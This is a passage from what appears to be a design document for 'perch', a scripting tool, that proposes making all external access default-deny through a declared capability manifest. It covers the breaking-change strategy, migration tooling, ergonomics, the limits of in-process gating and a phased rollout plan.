shell,mkdir,read_file,http_get,cp, etc. β needs arequiresblock, or it's now a non-runnable example. This touchesguide.md,applications.md,op-reference.md, the tutorials,recipes/*, and the demos. (The recent pass addedrequiresto flagship examples and 13 recipes; under this model it becomes mandatory for all of them.) docs/requires.mdβ expand from "declare bins/hosts/env" to "the complete capability manifest," documentingshell/net/read/write/subprocess.docs/op-reference.mdβ annotate every op with the capability it requires (a column), so readers see at a glance which ops are pure and which need a grant.docs/errors.mdβ document the six*_not_permittedkinds.docs/migrating-from-shell.md+ a new migration note β the "wrap your bash in ashellop" first step now also requires declaring theshellcapability + the bins, so the wrap step gains one block.mkdocs.ymlβ add this doc to nav; reorder so the default-deny story is near the top.- README.md β the "What perch is / isn't" and the hero need the same inversion as the GH home.
8. Breaking-change strategy¶
This is the largest breaking change perch could make: every existing .perch file that touches anything external stops working until it declares. That must be handled deliberately.
- Gate behind a major version. Default-deny ships in (say) perch 1.0; 0.x keeps ambient-default. SemVer makes the break legible.
- A transition flag.
perch --ambient(andPERCH_AMBIENT=1) re-enables the old all-access default for one release cycle, with a deprecation warning printed on every run. CI can flip it off to find what breaks. - A codemod / generator.
perch --infer-requires FILEwalks the program, collects every effectful op + the literal paths/bins/hosts it uses, and emits arequiresblock the author can paste in and tighten. This is the single most important ergonomic lever β see Β§9. --checkbecomes the migration tool. Run it, get the exact list of undeclared capabilities, add them. Wire into pre-commit so new files are born declared.
9. Ergonomics β making the narrow path the easy path¶
Every default-deny system that failed (Android pre-6, npm, browser permissions) failed because granting broadly was easier than granting narrowly. perch must make the opposite true:
perch --infer-requiresgenerates a tight manifest from real usage β paths as exact roots, bins as exact names, hosts as exact domains. The author starts narrow and only widens deliberately.- Declaring narrow is one line.
read "./src"is shorter than reasoning about it. Declaring broad (read "/") is visibly alarming in review and flagged HIGH by--scan. --checktells you exactly what's missing, with the exact line to add. The feedback loop is: write op β check β paste the suggested grant.- Pure programs need no block at all. A
.perchthat only transforms strings / JSON / hashes just works with zero ceremony β the ceremony scales with the danger.
10. Honest limits¶
- This is in-process capability gating, not a kernel sandbox. perch enforces the manifest by refusing to dispatch a denied op. It is airtight only if every op is correctly classified (Β§2) and there's no op that reaches the outside world without going through the gate. A misclassified op is a hole. For genuinely adversarial code, still layer an OS sandbox (
firejail/sandbox-exec/ a container) β and for untrusted logic, compile it to WASM and run it underwasm_run(see trust-by-manifest.md), where the boundary is the WASM runtime, not perch's op table. shellis a megacapability. Once you grantshell+ a bin, that bin can do anything it can do. perch gates which bin runs, not what the bin then does. The hash pin (bin "x" hash "β¦") and--no-shell-metacharsreduce, but don't eliminate, this. Prefer native ops overshellsoshellcan stay ungranted.- Filesystem path matching is prefix/glob, not a chroot. Symlinks out of an allowed root, TOCTOU between check and use, and
..traversal must be handled in the path canonicalizer or the guarantee leaks. - It does not make incorrect code correct. It bounds the blast radius of bugs and malice; it does not prevent logic errors within granted capabilities.
11. Phased plan¶
- Capability classification + gate (no default change yet). Add
domain/capability.go, the interpreter gate, and the*_not_permittederrors β but keep the default ambient so nothing breaks. The gate is a no-op until a flag turns it on. Ship + test. - Filesystem
read/writescopes inrequires. Grammar + loader + path canonicalizer + enforcement. Still opt-in. shell { bin β¦ }/net { host β¦ }two-level capability switches. Fold the existing bin/host allowlists under them.- Named handles (Β§3.1).
as NAMEinrequires, handle-position resolution inexec/read_file/http_get/get_env, and theunknown_capability/capability_kind_mismatchstatic checks. Non-breaking: string forms keep working; handles are the recommended sugar. perch --infer-requiresgenerator +--checkcapability coverage. The migration toolchain, before the default flips. The generator can emit named handles directly.- Flip the default to deny, behind perch 1.0 +
--ambientescape hatch. Docs/GH-Pages inversion lands with this. Deprecation cycle for--ambient. - Remove
--ambient. Zero ambient authority is the only mode.
Phases 1β5 are non-breaking and independently shippable. Phase 6 is the inversion. Phase 7 is the end state: a perch program has absolutely zero access to external resources except what it declares β no exceptions.
See also¶
- docs/requires.md β the manifest as it exists today (bins / hosts / env + version + hash pins)
- docs/sandbox.md β the current capability model (operator-applied flags) that this inverts
- docs/trust-by-manifest.md β the same default-deny idea applied to embedded WASM modules
- docs/errors.md β error-kind enum (where the
*_not_permittedkinds would live)